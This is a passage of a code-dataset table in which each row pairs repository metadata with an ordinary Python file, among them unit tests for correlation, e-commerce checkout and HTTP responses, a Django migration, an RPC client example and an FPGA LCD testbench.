| 50.136364 | 462 | 0.714415 | 286 | 2,206 | 5.465035 | 0.51049 | 0.056302 | 0.042226 | 0.047985 | 0.118362 | 0.055022 | 0.055022 | 0 | 0 | 0 | 0 | 0.003959 | 0.198549 | 2,206 | 43 | 463 | 51.302326 | 0.880091 | 0.479601 | 0 | 0 | 0 | 0 | 0.108179 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.033333 | 0.1 | null | null | 0.033333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
10e1be91406866f0d1fa96365de13d361b7ae9cd | 291 | py | Python | nltktest.py | HeikkiKeskustalo/Fuzzy-String-Matching | 21215d58473f2af72c039d6d3c186e18f04dd893 | [
"MIT"
] | null | null | null | nltktest.py | HeikkiKeskustalo/Fuzzy-String-Matching | 21215d58473f2af72c039d6d3c186e18f04dd893 | [
"MIT"
] | 7 | 2018-06-28T03:57:04.000Z | 2018-08-28T12:37:19.000Z | nltktest.py | EvoluzTampere/Fuzzy-String-Matching | 9137f23f9713e2778a8894cbfd3ef1dc34913599 | [
"MIT"
] | 1 | 2018-08-07T07:41:00.000Z | 2018-08-07T07:41:00.000Z | from nltk.stem.snowball import SnowballStemmer
letter = [u'kissassa']
for word in letter:
print word, SnowballStemmer("finnish").stem(word)
# read file (get a string)
# detect charset (UTF-8)
# decode (get a Unicode code point presentation)
# tokenize
# try out the Snowball stemmer
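# A minimal sketch of those steps (assumes a UTF-8 file named 'input.txt'):
#   with open('input.txt', 'rb') as f:
#       text = f.read().decode('utf-8')   # read + decode to Unicode code points
#   stemmer = SnowballStemmer("finnish")
#   for token in text.split():            # naive whitespace tokenization
#       print stemmer.stem(token)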
| 20.785714 | 53 | 0.738832 | 41 | 291 | 5.243902 | 0.804878 | 0.037209 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004115 | 0.164948 | 291 | 13 | 54 | 22.384615 | 0.880658 | 0.453608 | 0 | 0 | 0 | 0 | 0.098684 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.25 | null | null | 0.25 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
10eabbde5c8c1ecebe18272de8da83e00ed981a5 | 2,711 | py | Python | satchless/checkout/tests/__init__.py | styleseat/satchless | 884d0256c6af9b1de596d3875ee12dc02ecfaf8a | [
"BSD-4-Clause"
] | 1 | 2017-11-26T18:53:40.000Z | 2017-11-26T18:53:40.000Z | satchless/checkout/tests/__init__.py | styleseat/satchless | 884d0256c6af9b1de596d3875ee12dc02ecfaf8a | [
"BSD-4-Clause"
] | 13 | 2015-01-22T23:47:52.000Z | 2022-01-13T20:22:34.000Z | satchless/checkout/tests/__init__.py | styleseat/satchless | 884d0256c6af9b1de596d3875ee12dc02ecfaf8a | [
"BSD-4-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import absolute_import
from django.conf import settings
from django.http import HttpResponse
from django.test import (
Client,
TestCase,
)
from satchless.cart.tests import TestCart
from ...cart.models import CART_SESSION_KEY
from ...order.app import order_app
from ...pricing import handler as pricing_handler
from ...product.tests import DeadParrot
from ...product.tests.pricing import FiveZlotyPriceHandler
from ...order.tests import TestOrder
from ..app import CheckoutApp
class BaseCheckoutAppTests(TestCase):
def _create_cart(self, client):
cart = self._get_or_create_cart_for_client(client)
cart.replace_item(self.macaw_blue, 1)
return cart
def _get_or_create_cart_for_client(self, client=None, typ='cart'):
try:
            return TestCart.objects.get(
                pk=client.session[CART_SESSION_KEY % typ])
except KeyError:
cart = TestCart.objects.create(typ=typ)
client.session[CART_SESSION_KEY % typ] = cart.pk
return cart
def _get_or_create_order_for_client(self, client):
order_pk = client.session.get('satchless_order', None)
return self.checkout_app.order_model.objects.get(pk=order_pk)
def _create_order(self, client):
self._create_cart(client)
return self._get_order_from_session(client.session)
def _get_order_from_session(self, session):
order_pk = session.get('satchless_order', None)
if order_pk:
return self.checkout_app.order_model.objects.get(pk=order_pk)
return None
def _get_order_items(self, order):
order_items = set()
for group in order.groups.all():
order_items.update(group.items.values_list('product_variant',
'quantity'))
return order_items
class MockCheckoutApp(CheckoutApp):
cart_model = TestCart
order_model = TestOrder
def checkout(self, *args, **kwargs):
return HttpResponse()
class App(BaseCheckoutAppTests):
checkout_app = MockCheckoutApp()
def setUp(self):
self.anon_client = Client()
self.macaw = DeadParrot.objects.create(slug='macaw',
species="Hyacinth Macaw")
self.macaw_blue = self.macaw.variants.create(color='blue',
looks_alive=False)
self.original_handlers = settings.SATCHLESS_PRICING_HANDLERS
pricing_handler.pricing_queue = pricing_handler.PricingQueue(FiveZlotyPriceHandler)
def tearDown(self):
pricing_handler.pricing_queue = pricing_handler.PricingQueue(*self.original_handlers)
| 34.316456 | 93 | 0.677241 | 321 | 2,711 | 5.464174 | 0.267913 | 0.039909 | 0.023945 | 0.017104 | 0.230901 | 0.198974 | 0.116306 | 0.057013 | 0.057013 | 0.057013 | 0 | 0.001446 | 0.234969 | 2,711 | 78 | 94 | 34.75641 | 0.844262 | 0.007746 | 0 | 0.064516 | 0 | 0 | 0.029762 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.145161 | false | 0 | 0.193548 | 0.016129 | 0.580645 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
10f540c5034ca1b5afdb44405af84acd35b8db36 | 385 | py | Python | tests/unicode/unicode_id.py | learnforpractice/micropython-cpp | 004bc8382f74899e7b876cc29bfa6a9cc976ba10 | [
"MIT"
] | 692 | 2016-12-19T23:25:35.000Z | 2022-03-31T14:20:48.000Z | tests/unicode/unicode_id.py | learnforpractice/micropython-cpp | 004bc8382f74899e7b876cc29bfa6a9cc976ba10 | [
"MIT"
] | 509 | 2017-03-28T19:37:18.000Z | 2022-03-31T20:31:43.000Z | tests/unicode/unicode_id.py | learnforpractice/micropython-cpp | 004bc8382f74899e7b876cc29bfa6a9cc976ba10 | [
"MIT"
] | 228 | 2016-12-19T05:03:30.000Z | 2022-03-22T18:13:00.000Z | # test unicode in identifiers
# comment
# αβγδϵφζ
# global identifiers
α = 1
αβγ = 2
bβ = 3
βb = 4
print(α, αβγ, bβ, βb)
# function, argument, local identifiers
def α(β, γ):
δ = β + γ
print(β, γ, δ)
α(1, 2)
# class, method identifiers
class φ:
def __init__(self):
pass
def δ(self, ϵ):
print(ϵ)
zζzζz = φ()
if hasattr(zζzζz, "δ"):
zζzζz.δ(ϵ=123)
| 13.75 | 39 | 0.584416 | 64 | 385 | 3.453125 | 0.53125 | 0.027149 | 0.027149 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.032258 | 0.275325 | 385 | 27 | 40 | 14.259259 | 0.759857 | 0.327273 | 0 | 0 | 0 | 0 | 0.003968 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.176471 | false | 0.058824 | 0 | 0 | 0.235294 | 0.176471 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
10f5834075ee59a03333434f3790eb69637b29a2 | 552 | py | Python | examples/hsets.py | gfmartins/cssdbpy | f2369dd46caeb6bd84f2b1deacb8fb9416b26afc | [
"BSD-2-Clause"
] | 85 | 2016-09-05T19:41:37.000Z | 2021-11-08T11:26:54.000Z | examples/hsets.py | gfmartins/cssdbpy | f2369dd46caeb6bd84f2b1deacb8fb9416b26afc | [
"BSD-2-Clause"
] | 10 | 2016-09-22T06:42:08.000Z | 2018-12-12T13:55:16.000Z | examples/hsets.py | deslum/ssdbpy | 4cecc6f421bbf1782334b294569801c5808aaaa1 | [
"BSD-2-Clause"
] | 9 | 2016-09-06T08:41:32.000Z | 2020-09-08T04:04:23.000Z | from cssdbpy import Connection
from time import time
import md5
if __name__ == '__main__':
conn = Connection('127.0.0.1', 8888)
for i in xrange(0, 10000):
md5word = md5.new('word{}'.format(i)).hexdigest()
create = conn.execute('hset','words', md5word, int(time()))
value = conn.execute('hget','words', md5word)
exists = conn.execute('hexists','words', md5word)
delete = conn.execute('hdel','words', md5word)
print md5word, value, create, exists, delete
print conn.execute('hscan', 'words', '', '', 100)
conn.execute('hclear','words')
| 32.470588 | 61 | 0.677536 | 75 | 552 | 4.88 | 0.52 | 0.180328 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.056485 | 0.134058 | 552 | 16 | 62 | 34.5 | 0.709205 | 0 | 0 | 0 | 0 | 0 | 0.150362 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.214286 | null | null | 0.142857 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
10fd538c1e9b6fd2668077d80094be203d83e7ee | 531 | py | Python | backend/admingym/gyms/migrations/0003_auto_20200909_0508.py | ManuelRivera98/AdminGym | caf2b6f5e9a0ed9e98567a036bec9a34b44ecf13 | [
"MIT"
] | 1 | 2020-09-14T04:23:07.000Z | 2020-09-14T04:23:07.000Z | backend/admingym/gyms/migrations/0003_auto_20200909_0508.py | ManuelRivera98/AdminGym | caf2b6f5e9a0ed9e98567a036bec9a34b44ecf13 | [
"MIT"
] | null | null | null | backend/admingym/gyms/migrations/0003_auto_20200909_0508.py | ManuelRivera98/AdminGym | caf2b6f5e9a0ed9e98567a036bec9a34b44ecf13 | [
"MIT"
] | null | null | null | # Generated by Django 3.0 on 2020-09-09 05:08
import django.core.validators
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('gyms', '0002_auto_20200903_1750'),
]
operations = [
migrations.AlterField(
model_name='gym',
name='slug_name',
            field=models.CharField(max_length=10, unique=True, validators=[django.core.validators.RegexValidator(message='Can not have spaces.', regex='^[a-zA-Z0-9]+$')]),
),
]
| 26.55 | 170 | 0.642185 | 63 | 531 | 5.31746 | 0.777778 | 0.059701 | 0.119403 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.082524 | 0.224105 | 531 | 19 | 171 | 27.947368 | 0.730583 | 0.080979 | 0 | 0 | 1 | 0 | 0.148148 | 0.047325 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.153846 | 0 | 0.384615 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
8012691c1adce7b34dee33223df2c745e8a1cd12 | 5,830 | py | Python | tests/test_ref_numpy.py | kuraisle/multipletau | 0321de77616f05ca90106075f7f6ecd137437be7 | [
"BSD-3-Clause"
] | 10 | 2017-01-25T15:47:06.000Z | 2022-01-07T10:08:48.000Z | tests/test_ref_numpy.py | kuraisle/multipletau | 0321de77616f05ca90106075f7f6ecd137437be7 | [
"BSD-3-Clause"
] | 7 | 2016-02-10T10:19:22.000Z | 2018-11-30T23:21:04.000Z | tests/test_ref_numpy.py | kuraisle/multipletau | 0321de77616f05ca90106075f7f6ecd137437be7 | [
"BSD-3-Clause"
] | 4 | 2018-08-22T07:19:52.000Z | 2018-11-05T09:16:52.000Z | #!/usr/bin/python
# -*- coding: utf-8 -*-
"""Compare to numpy data"""
import sys
import numpy as np
import multipletau
from test_correlate import get_sample_arrays_cplx
def test_corresponds_ac():
myframe = sys._getframe()
myname = myframe.f_code.co_name
print("running ", myname)
a = np.concatenate(get_sample_arrays_cplx()).real
m = 16
restau = multipletau.autocorrelate(a=1*a,
m=m,
copy=True,
normalize=True,
dtype=np.float_)
reslin = multipletau.correlate_numpy(a=1*a,
v=1*a,
copy=True,
normalize=True,
dtype=np.float_)
idx = np.array(restau[:, 0].real, dtype=int)[:m]
assert np.allclose(reslin[idx, 1], restau[:m, 1])
def test_corresponds_ac_first_loop():
"""
numpy correlation:
G_m = sum_i(a_i*a_{i+m})
multipletau correlation 2nd order:
    b_j = (a_{2i} + a_{2i+1}) / 2
G_m = sum_j(b_j*b_{j+1})
= 1/4*sum_i(a_{2i} * a_{2i+m} +
a_{2i} * a_{2i+m+1} +
a_{2i+1} * a_{2i+m} +
a_{2i+1} * a_{2i+m+1}
)
The values after the first m+1 lag times in the multipletau
correlation differ from the normal correlation, because the
traces are averaged over two consecutive items, effectively
halving the size of the trace. The multiple-tau correlation
can be compared to the regular correlation by using an even
sized sequence (here 222) in which the elements 2i and 2i+1
are equal, as is done in this test.
"""
myframe = sys._getframe()
myname = myframe.f_code.co_name
print("running ", myname)
a = [arr / np.average(arr) for arr in get_sample_arrays_cplx()]
a = np.concatenate(a)[:222]
# two consecutive elements are the same, so the multiple-tau method
# corresponds to the numpy correlation for the first loop.
a[::2] = a[1::2]
for m in [2, 4, 6, 8, 10, 12, 14, 16]:
restau = multipletau.correlate(a=a,
v=a.imag+1j*a.real,
m=m,
copy=True,
normalize=False,
dtype=np.complex_)
reslin = multipletau.correlate_numpy(a=a,
v=a.imag+1j*a.real,
copy=True,
normalize=False,
dtype=np.complex_)
idtau = np.where(restau[:, 0] == m+2)[0][0]
tau3 = restau[idtau, 1] # m+1 initial bins
idref = np.where(reslin[:, 0] == m+2)[0][0]
tau3ref = reslin[idref, 1]
assert np.allclose(tau3, tau3ref)
def test_corresponds_ac_nonormalize():
myframe = sys._getframe()
myname = myframe.f_code.co_name
print("running ", myname)
a = np.concatenate(get_sample_arrays_cplx()).real
m = 16
restau = multipletau.autocorrelate(a=1*a,
m=m,
copy=True,
normalize=False,
dtype=np.float_)
reslin = multipletau.correlate_numpy(a=1*a,
v=1*a,
copy=True,
normalize=False,
dtype=np.float_)
idx = np.array(restau[:, 0].real, dtype=int)[:m+1]
assert np.allclose(reslin[idx, 1], restau[:m+1, 1])
def test_corresponds_cc():
myframe = sys._getframe()
myname = myframe.f_code.co_name
print("running ", myname)
a = np.concatenate(get_sample_arrays_cplx())
m = 16
restau = multipletau.correlate(a=a,
v=a.imag+1j*a.real,
m=m,
copy=True,
normalize=True,
dtype=np.complex_)
reslin = multipletau.correlate_numpy(a=a,
v=a.imag+1j*a.real,
copy=True,
normalize=True,
dtype=np.complex_)
idx = np.array(restau[:, 0].real, dtype=int)[:m+1]
assert np.allclose(reslin[idx, 1], restau[:m+1, 1])
def test_corresponds_cc_nonormalize():
myframe = sys._getframe()
myname = myframe.f_code.co_name
print("running ", myname)
a = np.concatenate(get_sample_arrays_cplx())
m = 16
restau = multipletau.correlate(a=a,
v=a.imag+1j*a.real,
m=m,
copy=True,
normalize=False,
dtype=np.complex_)
reslin = multipletau.correlate_numpy(a=a,
v=a.imag+1j*a.real,
copy=True,
normalize=False,
dtype=np.complex_)
idx = np.array(restau[:, 0].real, dtype=int)[:m+1]
assert np.allclose(reslin[idx, 1], restau[:m+1, 1])
if __name__ == "__main__":
# Run all tests
loc = locals()
for key in list(loc.keys()):
if key.startswith("test_") and hasattr(loc[key], "__call__"):
loc[key]()
| 33.125 | 71 | 0.456089 | 649 | 5,830 | 3.949153 | 0.224961 | 0.008584 | 0.066329 | 0.044479 | 0.615685 | 0.606321 | 0.600078 | 0.595006 | 0.589934 | 0.576668 | 0 | 0.030368 | 0.440823 | 5,830 | 175 | 72 | 33.314286 | 0.755828 | 0.158148 | 0 | 0.766355 | 0 | 0 | 0.012661 | 0 | 0 | 0 | 0 | 0 | 0.046729 | 1 | 0.046729 | false | 0 | 0.037383 | 0 | 0.084112 | 0.046729 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
8015962c36f7108badf443ec7534f5753cd6e921 | 2,101 | py | Python | test/test_cores/test_video/test_lt24lcdsys.py | meetps/rhea | f8a9a08fb5e14c5c4488ef68a2dff4d18222c2c0 | [
"MIT"
] | 1 | 2022-03-16T23:56:09.000Z | 2022-03-16T23:56:09.000Z | test/test_cores/test_video/test_lt24lcdsys.py | meetps/rhea | f8a9a08fb5e14c5c4488ef68a2dff4d18222c2c0 | [
"MIT"
] | null | null | null | test/test_cores/test_video/test_lt24lcdsys.py | meetps/rhea | f8a9a08fb5e14c5c4488ef68a2dff4d18222c2c0 | [
"MIT"
] | null | null | null |
from __future__ import print_function
from argparse import Namespace
# a video display model to check timing
import pytest
from myhdl import Signal, intbv, instance, delay, StopSimulation, now
from rhea.system import Clock, Reset, Global
from rhea.cores.video.lcd import LT24Interface
from rhea.models.video import LT24LCDDisplay
from rhea.utils.test import run_testbench, tb_args
from mm_lt24lcdsys import mm_lt24lcdsys
from mm_lt24lcdsys import convert
@pytest.mark.skipif(True, reason="pytest issue/error 10x runtime")
def test_lt24lcd():
args = Namespace()
tb_lt24lcd(args=args)
def tb_lt24lcd(args=None):
clock = Clock(0, frequency=50e6)
reset = Reset(0, active=0, async=True)
glbl = Global(clock, reset)
lcd_on = Signal(bool(0))
lcd_resetn = Signal(bool(0))
lcd_csn = Signal(bool(0))
lcd_rs = Signal(bool(0))
lcd_wrn = Signal(bool(0))
lcd_rdn = Signal(bool(0))
lcd_data = Signal(intbv(0)[16:])
lcd = LT24Interface()
resolution = lcd.resolution
color_depth = lcd.color_depth
# assign the ports to the interface
lcd.assign(lcd_on, lcd_resetn, lcd_csn, lcd_rs, lcd_wrn,
lcd_rdn, lcd_data)
mvd = LT24LCDDisplay()
def _bench_lt24lcdsys():
tbdut = mm_lt24lcdsys(clock, reset, lcd_on, lcd_resetn,
lcd_csn, lcd_rs, lcd_wrn, lcd_rdn,
lcd_data)
tbvd = mvd.process(glbl, lcd) # LCD display model
tbclk = clock.gen()
@instance
def tbstim():
yield reset.pulse(33)
yield clock.posedge
timeout = 33000
while mvd.update_cnt < 3 and timeout > 0:
yield delay(1000)
timeout -= 1
yield delay(100)
print("{:<10d}: simulation real time {}".format(now(), mvd.get_time()))
raise StopSimulation
return tbdut, tbvd, tbclk, tbstim
run_testbench(_bench_lt24lcdsys)
def test_conversion():
convert()
if __name__ == '__main__':
tb_lt24lcd(tb_args())
test_conversion()
| 26.2625 | 83 | 0.640647 | 272 | 2,101 | 4.742647 | 0.397059 | 0.046512 | 0.051163 | 0.065116 | 0.068217 | 0.068217 | 0.068217 | 0.068217 | 0.068217 | 0.068217 | 0 | 0.041451 | 0.265112 | 2,101 | 79 | 84 | 26.594937 | 0.794041 | 0.042361 | 0 | 0 | 0 | 0 | 0.034895 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.181818 | null | null | 0.036364 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
801d907dbd6651a1c3f1baa79169bbd085c486ee | 2,682 | py | Python | request_signer/tests/test_response.py | imtapps/django-request-signer | b059d021b6e068245030ab682c2cff4318c83ca6 | [
"BSD-2-Clause"
] | 1 | 2017-01-23T19:21:23.000Z | 2017-01-23T19:21:23.000Z | request_signer/tests/test_response.py | imtapps/django-request-signer | b059d021b6e068245030ab682c2cff4318c83ca6 | [
"BSD-2-Clause"
] | 14 | 2016-01-21T17:18:21.000Z | 2022-02-09T19:21:59.000Z | request_signer/tests/test_response.py | imtapps/django-request-signer | b059d021b6e068245030ab682c2cff4318c83ca6 | [
"BSD-2-Clause"
] | 3 | 2016-01-25T19:32:21.000Z | 2016-08-23T15:37:38.000Z | import six
if six.PY3:
from unittest import mock
from io import StringIO
else:
import mock
from cStringIO import StringIO
from http.client import responses
import json
from django import test
from request_signer.client.generic import Response
class ResponseTests(test.TestCase):
def setUp(self):
self.raw_response = mock.Mock()
self.response = Response(self.raw_response)
def test_response_requires_url_to_init(self):
self.assertEqual(self.response.raw_response, self.raw_response)
@mock.patch.object(Response, '_evaluate_response_code_for_success')
def test_response_is_successful_returns_value_from_evaluate(self, evaluate_response):
self.assertEqual(self.response.is_successful, evaluate_response.return_value)
@mock.patch.object(Response, 'status_code', mock.Mock())
@mock.patch.object(Response, '_evaluate_response_code_for_success')
def test_response_is_successful_calls_evaluate_with_status_code(self, evaluate_response):
getattr(self.response, 'is_successful')
evaluate_response.assert_called_once_with(self.response.status_code)
def test_bad_http_status_return_false_from_evaluate_response_code_for_success(self):
include_status = lambda status: status < 200 or status > 299
self.evaluate_response_code_for_success(False, include_status)
def test_good_http_status_return_true_from_evaluate_response_code_for_success(self):
include_status = lambda status: 199 < status < 300
self.evaluate_response_code_for_success(True, include_status)
def evaluate_response_code_for_success(self, expected, include_status):
statuses = (status for status in responses.keys() if include_status(status))
for response_code in statuses:
value = self.response._evaluate_response_code_for_success(response_code)
message = "it seems '%s' returned '%s' for some odd reason" % (response_code, value)
self.assertEqual(expected, value, message)
def test_status_code_returns_status_code_from_raw_response(self):
self.raw_response.code = 201
self.assertEqual(201, self.response.status_code)
def test_returns_dict_of_json_data_from_response(self):
self.raw_response.read.return_value = '{"first":"item"}'
self.assertEqual(dict(first='item'), self.response.json)
def test_can_read_response_multiple_times(self):
data = '{"data": "this is the response"}'
expected = json.loads(data)
self.response.raw_response = StringIO(data)
self.assertEqual(expected, self.response.json)
self.assertEqual(expected, self.response.json)
| 42.571429 | 96 | 0.751305 | 350 | 2,682 | 5.414286 | 0.248571 | 0.101319 | 0.084433 | 0.097098 | 0.367282 | 0.338786 | 0.150923 | 0.150923 | 0.150923 | 0.150923 | 0 | 0.008505 | 0.16704 | 2,682 | 62 | 97 | 43.258065 | 0.839749 | 0 | 0 | 0.081633 | 0 | 0 | 0.071961 | 0.0261 | 0 | 0 | 0 | 0 | 0.163265 | 1 | 0.204082 | false | 0 | 0.183673 | 0 | 0.408163 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
802cdedc55b19a30eabaf8043c64d8287cf38eb3 | 1,064 | py | Python | example/exc/client.py | so1n/rap | e4e3f4fab9df6190793ec97008bccb669546f207 | [
"Apache-2.0"
] | 3 | 2020-12-24T14:42:49.000Z | 2022-03-23T07:28:58.000Z | example/exc/client.py | so1n/rap | e4e3f4fab9df6190793ec97008bccb669546f207 | [
"Apache-2.0"
] | 1 | 2021-01-20T10:24:49.000Z | 2021-01-30T07:52:47.000Z | example/exc/client.py | so1n/rap | e4e3f4fab9df6190793ec97008bccb669546f207 | [
"Apache-2.0"
] | null | null | null | import asyncio
import time
from rap.client import Client
from rap.common.exceptions import FuncNotFoundError
client: Client = Client("example", [{"ip": "localhost", "port": "9000"}])
# in register, must use async def...
@client.register()
async def raise_msg_exc(a: int, b: int) -> int:
pass
# in register, must use async def...
@client.register()
async def raise_server_not_found_func_exc(a: int) -> None:
pass
async def main() -> None:
s_t = time.time()
await client.start()
try:
await raise_msg_exc(1, 2)
except Exception as e:
assert isinstance(e, ZeroDivisionError)
try:
await raise_server_not_found_func_exc(1)
except Exception as e:
assert isinstance(e, FuncNotFoundError)
print(time.time() - s_t)
await client.stop()
if __name__ == "__main__":
import logging
logging.basicConfig(
format="[%(asctime)s %(levelname)s] %(message)s", datefmt="%y-%m-%d %H:%M:%S", level=logging.INFO
)
loop = asyncio.get_event_loop()
loop.run_until_complete(main())
| 23.130435 | 105 | 0.662594 | 147 | 1,064 | 4.605442 | 0.47619 | 0.059084 | 0.041359 | 0.050222 | 0.32644 | 0.32644 | 0.257016 | 0.153619 | 0.153619 | 0.153619 | 0 | 0.008274 | 0.204887 | 1,064 | 45 | 106 | 23.644444 | 0.791962 | 0.06485 | 0 | 0.258065 | 0 | 0 | 0.090726 | 0 | 0 | 0 | 0 | 0 | 0.064516 | 1 | 0 | false | 0.064516 | 0.16129 | 0 | 0.16129 | 0.032258 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
8032858404b723ecb11e6d7ac5febb5da3de0fd6 | 1,452 | py | Python | src/block/mcmc.py | zeou1/maggot_models | 4e1b518c2981ab1ca9607099c3813e8429d94ca4 | [
"BSD-3-Clause"
] | null | null | null | src/block/mcmc.py | zeou1/maggot_models | 4e1b518c2981ab1ca9607099c3813e8429d94ca4 | [
"BSD-3-Clause"
] | null | null | null | src/block/mcmc.py | zeou1/maggot_models | 4e1b518c2981ab1ca9607099c3813e8429d94ca4 | [
"BSD-3-Clause"
] | null | null | null | # TODO write utilities for running MCMC stuff
import networkx as nx
from graph_tool.inference import minimize_blockmodel_dl
from graph_tool import load_graph
import numpy as np
import pandas as pd
import os
from src.graph import MetaGraph
def run_minimize_blockmodel(mg, temp_loc=None, weight_model=None):
meta = mg.meta.copy()
meta = pd.DataFrame(mg.meta["neuron_name"])
mg = MetaGraph(mg.adj, meta)
if temp_loc is None:
temp_loc = f"maggot_models/data/interim/temp-{np.random.randint(1e8)}.graphml"
# save to temp
nx.write_graphml(mg.g, temp_loc)
# load into graph-tool from temp
g = load_graph(temp_loc, fmt="graphml")
os.remove(temp_loc)
total_degrees = g.get_total_degrees(g.get_vertices())
remove_verts = np.where(total_degrees == 0)[0]
g.remove_vertex(remove_verts)
if weight_model is not None:
recs = [g.ep.weight]
rec_types = [weight_model]
else:
recs = []
rec_types = []
state_args = dict(recs=recs, rec_types=rec_types)
min_state = minimize_blockmodel_dl(g, verbose=False, state_args=state_args)
blocks = list(min_state.get_blocks())
verts = g.get_vertices()
block_map = {}
for v, b in zip(verts, blocks):
cell_id = int(g.vertex_properties["_graphml_vertex_id"][v])
block_map[cell_id] = int(b)
block_series = pd.Series(block_map)
block_series.name = "block_label"
return block_series
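# Minimal usage sketch (illustrative; assumes `mg` is a MetaGraph built elsewhere):
#   blocks = run_minimize_blockmodel(mg, weight_model="discrete-poisson")
#   print(blocks.value_counts())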
| 29.632653 | 86 | 0.694215 | 222 | 1,452 | 4.297297 | 0.414414 | 0.044025 | 0.027254 | 0.033543 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003454 | 0.202479 | 1,452 | 48 | 87 | 30.25 | 0.82038 | 0.059917 | 0 | 0 | 0 | 0 | 0.081558 | 0.047024 | 0 | 0 | 0 | 0.020833 | 0 | 1 | 0.027778 | false | 0 | 0.194444 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
803911ad68063ce4c7a23b2522b750059f50235b | 21,773 | py | Python | pin_kit/extras/pinplay/PinPoints/scripts/regions.py | sawansib/Sniper | 45ec1eeb09b81a7250bc1a1aaa452f16b2b7f497 | [
"MIT"
] | 1 | 2021-04-22T05:27:08.000Z | 2021-04-22T05:27:08.000Z | pin_kit/extras/pinplay/PinPoints/scripts/regions.py | sawansib/SNIPER | 45ec1eeb09b81a7250bc1a1aaa452f16b2b7f497 | [
"MIT"
] | null | null | null | pin_kit/extras/pinplay/PinPoints/scripts/regions.py | sawansib/SNIPER | 45ec1eeb09b81a7250bc1a1aaa452f16b2b7f497 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# BEGIN_LEGAL
# BSD License
#
# Copyright (c)2014 Intel Corporation. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer. Redistributions
# in binary form must reproduce the above copyright notice, this list of
# conditions and the following disclaimer in the documentation and/or
# other materials provided with the distribution. Neither the name of
# the Intel Corporation nor the names of its contributors may be used to
# endorse or promote products derived from this software without
# specific prior written permission.
#
